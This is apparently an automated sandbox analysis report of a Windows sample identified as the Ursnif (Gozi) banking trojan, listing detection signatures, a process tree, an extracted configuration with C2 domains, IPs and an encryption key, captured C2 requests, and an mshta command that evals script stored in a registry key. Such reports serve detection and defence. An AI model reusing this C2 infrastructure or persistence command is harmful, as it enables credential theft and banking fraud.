Loading ...

Play interactive tourEdit tour

Analysis Report a.exe

Overview

General Information

Sample Name:a.exe
Analysis ID:385479
MD5:6321729b9f33fea55483fbb3792c611b
SHA1:816ad37e36a68f89ab2ca4fea4f83879caeb6586
SHA256:369cfe293c93b001240bdee35859037c7513ceef781c8174938d0650c9e5575d
Tags:gozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Yara detected AntiVM3
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • a.exe (PID: 5472 cmdline: 'C:\Users\user\Desktop\a.exe' MD5: 6321729B9F33FEA55483FBB3792C611B)
    • a.exe (PID: 4280 cmdline: {path} MD5: 6321729B9F33FEA55483FBB3792C611B)
  • iexplore.exe (PID: 6752 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6800 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6752 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5704 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4892 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5704 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5048 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5704 CREDAT:82948 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6476 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5704 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 4244 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hpuv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hpuv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

Threatname: Ursnif

[{"RSA Public Key": "pQo4KM3R8eFYLdoECMIPO/fNsO/R/HK4kV0BXYECYloQSK7KS4zZTuTDX2DjIg0QQ/f/kuwGstNk0nYCXnXvpcTnWc5tfeErS6XtajLNuQFk3xd1/kTT3SeWu19JsEsxjPY+c7yLsdZjJRyX+jOCMjDszRu/faKKDVHAdoeOLdX64WevI8mc3fiPLbvB4KOP"}, {"c2_domain": ["c1.microsoft.com", "ctldl.windowsupdate.com", "195.123.214.61", "195.123.213.250", "195.123.214.20", "puvj2jr.xyz", "6ffddg2.xyz", "8iqnb33.xyz"], "dns_server": ["107.174.86.134", "107.175.127.22"], "DGA_count": "10", "ip_check_url": ["api.wipmania.com", "ipinfo.io/ip", "api.wipmania.com", "curlmyip.net"], "server": "12", "serpent_key": "10386128UJANFYTR", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "300", "time_value": "300", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "300", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "300", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "7676", "capture_window_title?(CRC_KEYLOGLIST)": "notepad, iexplore, chrome, firefox, terminal, mstsc, edge", "SetWaitableTimer_value": "60"}]

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000004.00000003.462274472.0000000001B4C000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.362892848.0000000001D48000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000003.362944534.0000000001D48000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.363046153.0000000001D48000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 7 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 4.3.a.exe.1cc94a0.1.raw.unpackMalware Configuration Extractor: Ursnif [{"RSA Public Key": "pQo4KM3R8eFYLdoECMIPO/fNsO/R/HK4kV0BXYECYloQSK7KS4zZTuTDX2DjIg0QQ/f/kuwGstNk0nYCXnXvpcTnWc5tfeErS6XtajLNuQFk3xd1/kTT3SeWu19JsEsxjPY+c7yLsdZjJRyX+jOCMjDszRu/faKKDVHAdoeOLdX64WevI8mc3fiPLbvB4KOP"}, {"c2_domain": ["c1.microsoft.com", "ctldl.windowsupdate.com", "195.123.214.61", "195.123.213.250", "195.123.214.20", "puvj2jr.xyz", "6ffddg2.xyz", "8iqnb33.xyz"], "dns_server": ["107.174.86.134", "107.175.127.22"], "DGA_count": "10", "ip_check_url": ["api.wipmania.com", "ipinfo.io/ip", "api.wipmania.com", "curlmyip.net"], "server": "12", "serpent_key": "10386128UJANFYTR", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "300", "time_value": "300", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "300", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "300", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "7676", "capture_window_title?(CRC_KEYLOGLIST)": "notepad, iexplore, chrome, firefox, terminal, mstsc, edge", "SetWaitableTimer_value": "60"}]
            Multi AV Scanner detection for submitted fileShow sources
            Source: a.exeVirustotal: Detection: 46%Perma Link
            Source: a.exeMetadefender: Detection: 13%Perma Link
            Source: a.exeReversingLabs: Detection: 31%
            Source: 4.2.a.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 0.2.a.exe.310d9b4.2.unpackAvira: Label: TR/Patched.Ren.Gen4
            Source: a.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: a.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

            Networking:

            barindex
            Performs DNS queries to domains with low reputationShow sources
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: 2q7mfx2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: 2q7mfx2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: 2q7mfx2.xyz
            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
            Source: global trafficHTTP traffic detected: GET /ddsadasdsaasdasdasd/nCQsOTqfa/4drLDa3auEFQqSoE0vyq/5xI8GCN1yHL5YcN3EBj/mfCnwe6xtjDp36cmouaBCM/5WXgtFq_2BgKp/PDd6mPao/VUS6J3k6OdP2bm_2B0Sh5Sb/v4qaeiBWrX/itXnEXJVNYim4ybL5/cIrwdun4JuQa/iFtQQTarJN7/ou3bA61QNiTDuh/w23BEo_2BStwd/6tUmvLY.pal HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 2q7mfx2.xyzConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 2q7mfx2.xyzConnection: Keep-AliveCookie: PHPSESSID=626b5h9nvpj75et1g5p6lfetg6; lang=en
            Source: global trafficHTTP traffic detected: GET /ddsadasdsaasdasdasd/pVvzK0_2/FwDvnZbRILJs4gC4ZNCtKHr/k327Dz9kpG/ZIs5yRxNJXU0MDx7K/1oYc2LXr26Jn/g5cPh2VKvvb/yvDaP_2F5_2F_2/BJc306ZiYZoF1QKdSMJJW/mGSWnCTz_2FMEjKy/DiOWbVEp8jQjHYx/7HEU8s2PxBoZ2q0K8s/zFYWNQgho/NDIqciBsagELw6U9Ykcj/Yn73Zb3X.pal HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 2q7mfx2.xyzConnection: Keep-AliveCookie: lang=en
            Source: global trafficHTTP traffic detected: GET /ddsadasdsaasdasdasd/akOFAAemOaw/GRWDQgHTmj_2BB/0SsNgHXf0_2F8YRF3MF_2/BTXUUhGsccvUTI0X/YtzO0a_2B5tA_2F/PAuzboBrzi2NYt1j_2/BTeCTzZqB/aUt8BZ0LT0UMxiZA_2FM/6a4EDRiKQ_2BhQNQcOC/Rn9l8Tt0802pyLpFPogw_2/F4g0qrzhYPym6/9lYbjfC9/i8invrB3NNgg4mE9K5Lu1uv/_2F.pal HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 2q7mfx2.xyzConnection: Keep-AliveCookie: lang=en
            Source: msapplication.xml0.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa6cafa8b,0x01d72fea</date><accdate>0xa6cafa8b,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa6cafa8b,0x01d72fea</date><accdate>0xa6cafa8b,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa6cfbf55,0x01d72fea</date><accdate>0xa6cfbf55,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa6cfbf55,0x01d72fea</date><accdate>0xa6cfbf55,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa6d221a8,0x01d72fea</date><accdate>0xa6d221a8,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa6d221a8,0x01d72fea</date><accdate>0xa6d221a8,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: 2q7mfx2.xyz
            Source: a.exe, 00000004.00000002.482582082.0000000001F60000.00000002.00000001.sdmpString found in binary or memory: http://2q7mfx2.xyz/ddsadasdsaasdasdasd/akOFAAemOaw/GRWDQgHTmj_2BB/0SsNgHXf0_2F8YRF3MF_2/BTXUUhG
            Source: ~DF20E1CBD0001D92CD.TMP.32.dr, {EB16AD6A-9BDD-11EB-90E4-ECF4BB862DED}.dat.32.drString found in binary or memory: http://2q7mfx2.xyz/ddsadasdsaasdasdasd/akOFAAemOaw/GRWDQgHTmj_2BB/0SsNgHXf0_2F8YRF3MF_2/BTXUUhGsccvU
            Source: ~DFBEABCA28CF22FEB6.TMP.32.dr, {EB16AD66-9BDD-11EB-90E4-ECF4BB862DED}.dat.32.drString found in binary or memory: http://2q7mfx2.xyz/ddsadasdsaasdasdasd/nCQsOTqfa/4drLDa3auEFQqSoE0vyq/5xI8GCN1yHL5YcN3EBj/mfCnwe6xtj
            Source: ~DFE8E2529E38BBDC04.TMP.32.dr, {EB16AD68-9BDD-11EB-90E4-ECF4BB862DED}.dat.32.drString found in binary or memory: http://2q7mfx2.xyz/ddsadasdsaasdasdasd/pVvzK0_2/FwDvnZbRILJs4gC4ZNCtKHr/k327Dz9kpG/ZIs5yRxNJXU0MDx7K
            Source: imagestore.dat.33.drString found in binary or memory: http://2q7mfx2.xyz/favicon.ico
            Source: imagestore.dat.33.drString found in binary or memory: http://2q7mfx2.xyz/favicon.ico~
            Source: a.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
            Source: a.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: a.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
            Source: a.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA.crt0
            Source: a.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
            Source: a.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: a.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
            Source: a.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: a.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: a.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
            Source: a.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigning-g1.crl03
            Source: a.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
            Source: a.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: a.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
            Source: a.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: a.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: a.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
            Source: a.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigning-g1.crl0K
            Source: a.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
            Source: a.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: a.exeString found in binary or memory: http://ocsp.digicert.com0A
            Source: a.exeString found in binary or memory: http://ocsp.digicert.com0C
            Source: a.exeString found in binary or memory: http://ocsp.digicert.com0H
            Source: a.exeString found in binary or memory: http://ocsp.digicert.com0I
            Source: a.exeString found in binary or memory: http://ocsp.digicert.com0O
            Source: msapplication.xml.23.drString found in binary or memory: http://www.amazon.com/
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: a.exe, 00000000.00000003.216296847.0000000005B7D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comC
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: a.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmp, a.exe, 00000000.00000003.220468718.0000000005B7B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmp, a.exe, 00000000.00000003.220383197.0000000005B79000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: a.exe, 00000000.00000003.213699842.0000000005B8B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comcqf
            Source: a.exe, 00000000.00000003.213661113.0000000005B8B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comic7fj
            Source: a.exe, 00000000.00000003.213719719.0000000005B8B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.commf0
            Source: a.exe, 00000000.00000003.213740030.0000000005B8B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comnHf
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: a.exe, 00000000.00000003.215218795.0000000005B72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: a.exe, 00000000.00000003.214915238.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cns
            Source: a.exe, 00000000.00000003.221382499.0000000005BAE000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: a.exe, 00000000.00000003.221382499.0000000005BAE000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/P
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: msapplication.xml1.23.drString found in binary or memory: http://www.google.com/
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: msapplication.xml2.23.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.23.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.23.drString found in binary or memory: http://www.reddit.com/
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: msapplication.xml5.23.drString found in binary or memory: http://www.twitter.com/
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: msapplication.xml6.23.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.23.drString found in binary or memory: http://www.youtube.com/
            Source: a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: a.exeString found in binary or memory: https://www.digicert.com/CPS0

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.462274472.0000000001B4C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362892848.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362944534.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363046153.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362984170.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362843477.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363021516.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363119118.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363077727.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: a.exe PID: 4280, type: MEMORY
            Source: a.exe, 00000000.00000002.236939417.0000000001000000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.462274472.0000000001B4C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362892848.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362944534.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363046153.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362984170.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362843477.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363021516.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363119118.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363077727.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: a.exe PID: 4280, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Users\user\Desktop\a.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Users\user\Desktop\a.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Users\user\Desktop\a.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Users\user\Desktop\a.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Users\user\Desktop\a.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Users\user\Desktop\a.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Users\user\Desktop\a.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Users\user\Desktop\a.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Users\user\Desktop\a.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Users\user\Desktop\a.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Users\user\Desktop\a.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Users\user\Desktop\a.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Users\user\Desktop\a.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Users\user\Desktop\a.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Users\user\Desktop\a.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Users\user\Desktop\a.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Users\user\Desktop\a.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Users\user\Desktop\a.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Users\user\Desktop\a.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Users\user\Desktop\a.exeCode function: 4_2_004015F8 GetProcAddress,NtCreateSection,memset,4_2_004015F8
            Source: C:\Users\user\Desktop\a.exeCode function: 4_2_00401179 NtMapViewOfSection,4_2_00401179
            Source: a.exeStatic PE information: invalid certificate
            Source: a.exeStatic PE information: invalid certificate
            Source: a.exeStatic PE information: Resource name: RT_RCDATA type: Zip archive data, at least v2.0 to extract
            Source: a.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: a.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: a.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: a.exe, 00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs a.exe
            Source: a.exe, 00000000.00000002.237616493.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs a.exe
            Source: a.exe, 00000000.00000002.237616493.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs a.exe
            Source: a.exe, 00000000.00000002.237616493.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs a.exe
            Source: a.exe, 00000000.00000002.236939417.0000000001000000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs a.exe
            Source: a.exe, 00000000.00000002.243348807.0000000005140000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs a.exe
            Source: a.exe, 00000000.00000002.236391375.00000000007B0000.00000002.00020000.sdmpBinary or memory string: OriginalFilename3 vs a.exe
            Source: a.exe, 00000000.00000002.238240083.0000000002DBB000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMetroFramework.dll> vs a.exe
            Source: a.exe, 00000004.00000002.479485002.00000000006E0000.00000002.00020000.sdmpBinary or memory string: OriginalFilename3 vs a.exe
            Source: a.exeBinary or memory string: OriginalFilename3 vs a.exe
            Source: a.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: a.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
